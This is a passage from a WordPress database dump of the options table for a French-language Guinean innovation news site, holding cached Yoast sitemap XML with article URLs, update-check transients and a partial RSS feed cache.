HG','no'),(2127,'wpseo_sitemap_181_cache_validator','4JCHT','no'),(2128,'wpseo_sitemap_175_cache_validator','4JCI6','no'),(2129,'wpseo_sitemap_163_cache_validator','3hQM','no'),(2130,'wpseo_sitemap_169_cache_validator','nLu4','no'),(2131,'wpseo_sitemap_157_cache_validator','nLuh','no'),(2132,'wpseo_sitemap_151_cache_validator','nLuu','no'),(2133,'wpseo_sitemap_145_cache_validator','nLuH','no'),(2134,'wpseo_sitemap_139_cache_validator','nLv1','no'),(2135,'wpseo_sitemap_127_cache_validator','nLvf','no'),(2136,'wpseo_sitemap_133_cache_validator','4JCJY','no'),(2137,'wpseo_sitemap_121_cache_validator','4JCKE','no'),(2138,'wpseo_sitemap_115_cache_validator','4JCLd','no'),(2139,'wpseo_sitemap_109_cache_validator','4JCLq','no'),(2140,'wpseo_sitemap_103_cache_validator','4JCLE','no'),(2141,'wpseo_sitemap_97_cache_validator','4JCLR','no'),(2142,'wpseo_sitemap_91_cache_validator','4JCM5','no'),(2143,'wpseo_sitemap_85_cache_validator','4JCMj','no'),(2144,'wpseo_sitemap_79_cache_validator','4JCMx','no'),(2145,'wpseo_sitemap_73_cache_validator','4JCMM','no'),(2146,'wpseo_sitemap_67_cache_validator','4JCN2','no'),(2147,'wpseo_sitemap_56_cache_validator','4JCNi','no'),(2148,'wpseo_sitemap_61_cache_validator','4JCNw','no'),(2149,'wpseo_sitemap_50_cache_validator','4JCNL','no'),(2150,'wpseo_sitemap_44_cache_validator','4JCNZ','no'),(2151,'wpseo_sitemap_38_cache_validator','4JCOe','no'),(2152,'wpseo_sitemap_26_cache_validator','4JCOs','no'),(2153,'wpseo_sitemap_32_cache_validator','4JCOH','no'),(2154,'wpseo_sitemap_20_cache_validator','4JCOU','no'),(2155,'wpseo_sitemap_14_cache_validator','4JCP9','no'),(2156,'wpseo_sitemap_8_cache_validator','4JCPn','no'),(2253,'wpseo_sitemap_668_cache_validator','4OR9j','no'),(2254,'wpseo_sitemap_661_cache_validator','4OR9I','no'),(2315,'_site_transient_timeout_browser_cb0f25941c7ee58acd15fece4d84c18b','1512982593','no'),(2316,'_site_transient_browser_cb0f25941c7ee58acd15fece4d84c18b','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"62.0.3202.94\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(2399,'_transient_timeout_yst_sm_page_1:47KvK_4172G','1512697296','no'),(2400,'_transient_yst_sm_page_1:47KvK_4172G','C:24:\"WPSEO_Sitemap_Cache_Data\":1701:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:1653:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/</loc>\n		<lastmod>2017-11-27T11:32:39+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/technologie/</loc>\n		<lastmod>2017-11-01T15:35:41+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/economie/</loc>\n		<lastmod>2017-11-01T15:39:24+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/culture-2/</loc>\n		<lastmod>2017-11-01T15:44:33+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/agriculture/</loc>\n		<lastmod>2017-11-01T15:45:36+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/sante/</loc>\n		<lastmod>2017-11-01T15:47:38+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/culture/</loc>\n		<lastmod>2017-11-01T15:57:34+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/societe/</loc>\n		<lastmod>2017-11-01T16:02:28+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/autres/</loc>\n		<lastmod>2017-11-01T16:06:03+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/contact-2/</loc>\n		<lastmod>2017-11-01T16:25:25+00:00</lastmod>\n	</url>\n</urlset>\";}}','no'),(2410,'_site_transient_timeout_browser_b912b77c9df611085048e5b46605d7ee','1513240957','no'),(2411,'_site_transient_browser_b912b77c9df611085048e5b46605d7ee','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"62.0.3202.94\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(2420,'_transient_timeout_wpseo-statistics-totals','1512746733','no'),(2421,'_transient_wpseo-statistics-totals','a:1:{i:1;a:2:{s:6:\"scores\";a:3:{i:0;a:4:{s:8:\"seo_rank\";s:3:\"bad\";s:5:\"label\";s:65:\"Articles avec un score SEO <strong>peut être amélioré</strong>\";s:5:\"count\";s:2:\"12\";s:4:\"link\";s:116:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=bad\";}i:1;a:4:{s:8:\"seo_rank\";s:2:\"ok\";s:5:\"label\";s:46:\"Articles avec un score SEO <strong>OK</strong>\";s:5:\"count\";s:1:\"8\";s:4:\"link\";s:115:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=ok\";}i:2;a:4:{s:8:\"seo_rank\";s:2:\"na\";s:5:\"label\";s:49:\"Articles <strong>sans</strong> mot-clé principal\";s:5:\"count\";s:1:\"2\";s:4:\"link\";s:115:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=na\";}}s:8:\"division\";a:5:{s:3:\"bad\";d:0.545454545454545414173708195448853075504302978515625;s:2:\"ok\";d:0.36363636363636364645657295113778673112392425537109375;s:4:\"good\";i:0;s:2:\"na\";d:0.0909090909090909116141432377844466827809810638427734375;s:7:\"noindex\";i:0;}}}','no'),(2437,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/fr_FR/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"fr_FR\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/fr_FR/wordpress-4.9.1.zip\";s:10:\"no_content\";b:0;s:11:\"new_bundled\";b:0;s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.1\";s:7:\"version\";s:5:\"4.9.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1512722677;s:15:\"version_checked\";s:5:\"4.8.4\";s:12:\"translations\";a:0:{}}','no'),(2447,'_transient_timeout_yst_sm_1_1:47KvK_fcdE','1512771586','no'),(2448,'_transient_yst_sm_1_1:47KvK_fcdE','C:24:\"WPSEO_Sitemap_Cache_Data\":550:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:503:\"<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<sitemap>\n		<loc>https://guineeinnove.nimbasolution.com/post-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</sitemap>\n	<sitemap>\n		<loc>https://guineeinnove.nimbasolution.com/page-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:32:39+00:00</lastmod>\n	</sitemap>\n	<sitemap>\n		<loc>https://guineeinnove.nimbasolution.com/category-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</sitemap>\n</sitemapindex>\";}}','no'),(2451,'_transient_timeout_yst_sm_category_1:47KvK_4OR9o','1512787451','no'),(2452,'_transient_yst_sm_category_1:47KvK_4OR9o','C:24:\"WPSEO_Sitemap_Cache_Data\":1528:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:1480:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/agriculture/</loc>\n		<lastmod>2017-11-20T16:45:30+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/autre/</loc>\n		<lastmod>2017-11-22T10:36:49+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/culture/</loc>\n		<lastmod>2017-11-01T11:49:32+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/economie/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/sante/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/societe/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/sport/</loc>\n		<lastmod>2017-11-01T13:00:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/technologie/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n	</url>\n</urlset>\";}}','no'),(2456,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1512722679;s:7:\"checked\";a:4:{s:6:\"magzma\";s:3:\"1.1\";s:13:\"twentyfifteen\";s:3:\"1.8\";s:15:\"twentyseventeen\";s:3:\"1.3\";s:13:\"twentysixteen\";s:3:\"1.3\";}s:8:\"response\";a:3:{s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.1.9.zip\";}s:15:\"twentyseventeen\";a:4:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.1.4.zip\";}s:13:\"twentysixteen\";a:4:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.1.4.zip\";}}s:12:\"translations\";a:0:{}}','no'),(2461,'_transient_timeout_yst_sm_post_1:47KvK_fcdQ','1512798589','no'),(2462,'_transient_yst_sm_post_1:47KvK_fcdQ','C:24:\"WPSEO_Sitemap_Cache_Data\":10965:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:10916:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/</loc>\n		<lastmod>2017-10-31T15:39:03+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/moustapha.jpg</image:loc>\n			<image:title><![CDATA[moustapha]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/alpha-oumar-gagne-le-concours-national-de-dessin-et-de-peinture-organise-par-la-delegation-de-lunion-europeenne-en-guinee/</loc>\n		<lastmod>2017-11-01T11:49:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Culture.jpg</image:loc>\n			<image:title><![CDATA[Culture]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/jawards-guinee-la-structure-intelligentsia-guinee-lance-la-1ere-edition/</loc>\n		<lastmod>2017-11-01T11:57:56+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Jawards.jpg</image:loc>\n			<image:title><![CDATA[Jawards]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/sekou-lamine-coyah-bangoura/</loc>\n		<lastmod>2017-11-01T12:04:09+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sekou.jpg</image:loc>\n			<image:title><![CDATA[sekou]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/kerfalla-camara-cree-le-cafe-ziama-macenta/</loc>\n		<lastmod>2017-11-01T12:18:58+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/cafe_ziama_macenta-679x380.jpg</image:loc>\n			<image:title><![CDATA[cafe_ziama_macenta-679x380]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/mamoudou-diallo-createur-de-quizz224/</loc>\n		<lastmod>2017-11-01T12:34:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Mood.jpg</image:loc>\n			<image:title><![CDATA[Mood]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed.png</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/une-plateforme-dinformations-sur-les-procedures-administratives/</loc>\n		<lastmod>2017-11-01T12:36:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Yali-Guin%C3%A9e.jpg</image:loc>\n			<image:title><![CDATA[Yali-Guinée]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp-2.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/une-marque-de-vetements-de-sport-en-guinee/</loc>\n		<lastmod>2017-11-01T13:00:44+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/AfricaPostNews-Guin%C3%A9e-vetements-de-sport.jpg</image:loc>\n			<image:title><![CDATA[AfricaPostNews-Guinée-vetements-de-sport]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/un-journal-televise-rappe-par-hadafo-media-en-guinee/</loc>\n		<lastmod>2017-11-01T13:05:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/JTR.jpg</image:loc>\n			<image:title><![CDATA[JTR]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou/</loc>\n		<lastmod>2017-11-01T13:17:01+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943.jpg</image:loc>\n			<image:title><![CDATA[_97723064_img_20170730_131943]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/fatoumata-cherif-cree-plateforme-de-medias-ligne-developpement-durable/</loc>\n		<lastmod>2017-11-01T13:49:37+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/fc.jpg</image:loc>\n			<image:title><![CDATA[fc]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/er.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/ibrahima-soumano-cree-plateforme-universelle-de-recharges-telephoniques/</loc>\n		<lastmod>2017-11-01T14:35:33+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sen.jpg</image:loc>\n			<image:title><![CDATA[sen]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sedd.png</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/lemine-camara-utilise-feuilles-de-kola-regenerer-terres-infertiles/</loc>\n		<lastmod>2017-11-01T14:59:38+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/plantation5_0.jpg</image:loc>\n			<image:title><![CDATA[plantation5_0]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/alpha-amadou-diallo-cree-application-aider-compatriotes-a-se-deplacer-plus-facilement/</loc>\n		<lastmod>2017-11-01T15:14:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/aad.jpg</image:loc>\n			<image:title><![CDATA[aad]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent/</loc>\n		<lastmod>2017-11-01T16:04:51+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sss.jpg</image:loc>\n			<image:title><![CDATA[sss]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/alpha-mamadou-diallo-cree-une-plateforme-pour-faciliter-lacces-au-livre/</loc>\n		<lastmod>2017-11-02T15:10:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/alpha.jpg</image:loc>\n			<image:title><![CDATA[alpha]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/sambako-et-sa-petite-revolution-agricole/</loc>\n		<lastmod>2017-11-06T09:31:08+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sb.jpg</image:loc>\n			<image:title><![CDATA[sb]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/fatou-thithi-camara-creee-un-carnet-de-sante-digitale/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Fatou.jpg</image:loc>\n			<image:title><![CDATA[Fatou]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/08/guineen-publie-formule-mathematique-met-fin-a-vielle-recherche-de-plus-de-2000-ans/</loc>\n		<lastmod>2017-11-08T12:24:25+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/hawing.jpg</image:loc>\n			<image:title><![CDATA[hawing]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/20/bhoye-bah-cree-marque-de-cafe-arabica-100-bio/</loc>\n		<lastmod>2017-11-20T16:45:30+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Bhoye.jpg</image:loc>\n			<image:title><![CDATA[Bhoye]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/eee.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/22/kady-tounkara-aide-guineens-a-trouver-partenaire-mariage/</loc>\n		<lastmod>2017-11-22T10:36:49+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/kady-tounkara-1068x801-696x522.jpg</image:loc>\n			<image:title><![CDATA[kady-tounkara-1068x801-696x522]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/25/__trashed-4/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/received_1606639512733963-1.jpeg</image:loc>\n			<image:title><![CDATA[OCP]]></image:title>\n		</image:image>\n	</url>\n</urlset>\";}}','no'),(2463,'_transient_timeout_elementor_remote_info_api_data_1.8.0','1512762151','no'),(2464,'_transient_elementor_remote_info_api_data_1.8.0','a:2:{s:9:\"timestamp\";i:1512718951;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(2465,'_site_transient_timeout_community-events-d91e555fff5d473a0f4d65e1d05ff461','1512762162','no'),(2466,'_site_transient_community-events-d91e555fff5d473a0f4d65e1d05ff461','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"41.223.49.0\";}s:6:\"events\";a:0:{}}','no'),(2467,'_transient_timeout_feed_66a70e9599b658d5cc038e8074597e7c','1512762162','no'),(2468,'_transient_feed_66a70e9599b658d5cc038e8074597e7c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"https://wpfr.net\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Site officiel de la communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 08 Dec 2017 07:26:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Certification WordPress par WPFR, appel à 